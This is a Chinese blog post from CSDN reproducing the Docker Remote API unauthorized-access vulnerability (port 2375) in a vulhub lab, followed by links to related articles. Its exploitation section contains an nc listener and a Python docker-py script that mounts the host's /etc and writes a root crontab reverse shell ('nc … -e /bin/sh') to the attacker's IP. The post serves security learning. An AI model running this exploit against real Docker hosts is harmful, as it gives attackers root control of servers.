Docker API 未授权访问漏洞复现

最新推荐文章于 2024-06-11 17:05:35 发布
最新推荐文章于 2024-06-11 17:05:35 发布
阅读量5.3k 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: docker vulhub 未授权访问 漏洞复现 docker api
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43571641/article/details/108317554
版权

PS:欢迎访问我的个人博客 http://luckyzmj.cn

0x01 漏洞简介

该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。

0x02 环境准备

  • 靶机环境:192.168.126.130 (ubuntu)
  • 攻击环境:192.168.126.128 (kali)

在靶机上使用vulhub复现漏洞环境。

  • vulhub官网地址:https://vulhub.org
cd /vulhub/docker/unauthorized-rce
docker-compose build
docker-compose up -d

0x03 漏洞检测

直接输入地址 http://your-ip:2375/version ;若能访问,证明存在未授权访问漏洞。

0x04 漏洞利用

在kali上安装docker环境

apt-get install docker docker-compose
service docker start

在kali上开启nc监听本地1111端口,用来接收反弹的Shell

nc -l -p 1111

使用Docker随意启动一个容器,并将宿主机的 /etc 目录挂载到容器中,便可以任意读写文件了。可以将命令写入 crontab 配置文件,进行反弹shell。

import docker

client = docker.DockerClient(base_url='http://192.168.126.130:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.126.128 1111 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

然后执行 python 脚本反弹Shell给Kali主机的1111端口。

python docker-hack.py

如果kali上运行脚本报错:No module named ssl_match_hostname,可以查看这篇文章解决

执行完脚本,耐心等待一会才会反弹shell到kali主机,大约一分多钟时间。

参考文章

  • https://www.jianshu.com/p/43d86d7ed3a5
  • https://www.cnblogs.com/itworks/p/7159477.html
Luckysec
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
DOCKER学习_010:Docker的文件系统以及制作镜像
li123128的博客
01-02 1097
目录 一 文件系统简介 1.1 Linux文件系统 1.2 docker的base镜像 1.3 镜像的分层结构 二 commit制作Docker镜像 2.1 下载基础镜像 2.2 安装一个ssh服务 2.3 修改root密码 2.4 从宿主机连接 2.5 向容器拷贝文件 2.6 安装vim 2.7 创建镜像 三 镜像的测试使用修改 3.1 使用刚创建的镜像,起一个容器 3.2 测试连接 3.3 ...
vluhubdocker-unauthoriun-rce复现
weixin_45006525的博客
08-07 1463
1.漏洞简介: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url实现docker命令。 2.漏洞复现 环境介绍: 1.攻击机kali:192.168.231.128 2.靶机ubuntu:192.168.231.185 靶场搭建 (1):ubuntu下载vluhub vulhub官网地址:https://vulhub.org github下载:https://github.com/vulhub/vulh
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 2434
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker授权漏洞利用,ssh密钥连接
Docker API 授权访问漏洞
qq_42383069的博客
05-09 7775
Docker API 授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
Docker授权访问漏洞详解
最新发布
m0_64481831的博客
06-11 1216
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。
部署 Docker Registry 并配置认证登录
以梦为马|越骑越傻
05-15 1989
文章目录搭建 Docker Registry创建本地映射目录启动 Docker Registry配置 Docker Registry配置 Docker Registry 认证启动带认证的 Docker Registry配置 Docker Registry登录 Docker Registry测试 Docker Registry Docker Registry 官网 Docker Registry 需要 Docker 版本高于等于 1.6.0 Registry是一个无状态、高度可扩展的服务器侧应用程序,用于存
漏洞复现-docker-unauthorized-rce
qq_59350385的博客
06-27 6407
一、漏洞介绍1.1漏洞成因 docker remote API授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备 靶机环境:192.168.xx.xxx (ubuntu) 攻击环境:192.168.xx.xxx (kali) 在靶机上使用复现漏洞环境。 vulhub官网地址:https://vulhub.org 二、漏洞检测直接输入地址 ;若能访
Docker Remote API 授权漏洞全球探测1
08-03
漏洞发现的起因是,有一位同学在使用 docker swarm 的时候,发现了管理的 docker 节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.
DockerDocker Remote API 访问控制
01-09
Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##...
Docker API授权漏洞复现
crowsec
01-27 4090
如果在docker上配置了远程访问docker 节点上会开放一个TCP端口2375,绑定在0.0.0.0上,如果没有做限制的话,攻击者就可以通过Docker授权来控制服务器 扫取二维码获取更多信息! 微信公众号:乌鸦安全 扫取二维码获取更多信息!
春秋云镜-【仿真场景】Unauthorized writeup
渗透测试研究中心
03-07 891
说明Unauthorized是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。技术FTP、Privilege Elevation、AD CS、Kerberos、域渗透第一个flagdocker 授权通过外网...
Docker授权API逃逸
qq_69775412的博客
04-19 2226
一、Docker授权介绍: dockerswarm: docker swarm是一个将docker集群变成单一虚拟的dockerhost工具,使用标准的DockerAPI,能够方便docker集群的管理和扩展,由docker官方提供,具体的大家可以看官网介绍:https://docs.docker.com/engine/swarm/ 漏洞起因: 在使用dockerswarm的时候,发现管理的docker节点上会开放一个tcp端口2375,并且绑定在0.0.0.0上,http访问会返回404p...
Docker 仓库之单机 Docker Registry
Dou_Hua_Hua的博客
08-07 652
在公司规模较小的情况下我们可以通过docker官方仓库的方式来进行构建。 Docker Registry 作为 Docker 的核心组件之一负责镜像内容的存储与分发,客户端的 docker pull 以及 push 命令都将直接与 registry 进行交互,最初版本的 registry 由Python 实现,由于设计初期在安全性,性能以及API 的设计上有着诸多的缺陷, 该版本在 0.9 之后停止了开发,由新的项目 distribution(新的 docker register 被称为 Distribut
Docker Remote API授权访问漏洞以及安全防护
qq_46487664的博客
07-26 544
设备IP地址操作类型docker版本镜像训练机centos718.03.1-ce靶机Ubuntu24.0.4至少一个容器镜像。
漏洞复现 - - -Docker授权访问漏洞
weixin_67503304的博客
08-16 4908
Docker授权访问漏洞docker授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
漏洞扫描-Docker Remote API 授权访问漏洞利用
weixin_44041994的博客
03-15 362
Docker提供了一个用于与Docker守护程序交互的API(称为 Docker 引擎 API)。Docker引擎API是一个RESTful API,可由HTTP客户端(如 wget 或 curl)或HTTP 库访问,HTTP库是大多数现代编程语言的一部分。在网址栏输入 目标主机IP:2375/containers/json可获取该主机的Docker容器信息。使用docker命令创建一个alpine容器,并将目标主机的磁盘挂载到容器中。Docker是一种执行操作系统级虚拟化的计算机程序,也称为"容器化"。
Docker Registry 授权访问漏洞
04-25
Docker Registry 授权访问漏洞是指攻击者可以在授权的情况下访问或者下载镜像。这种漏洞的危害性较大,因为攻击者可以使用被盗取的镜像发起攻击,造成不可预测的后果。要解决这个问题,可以通过限制访问 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Luckysec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值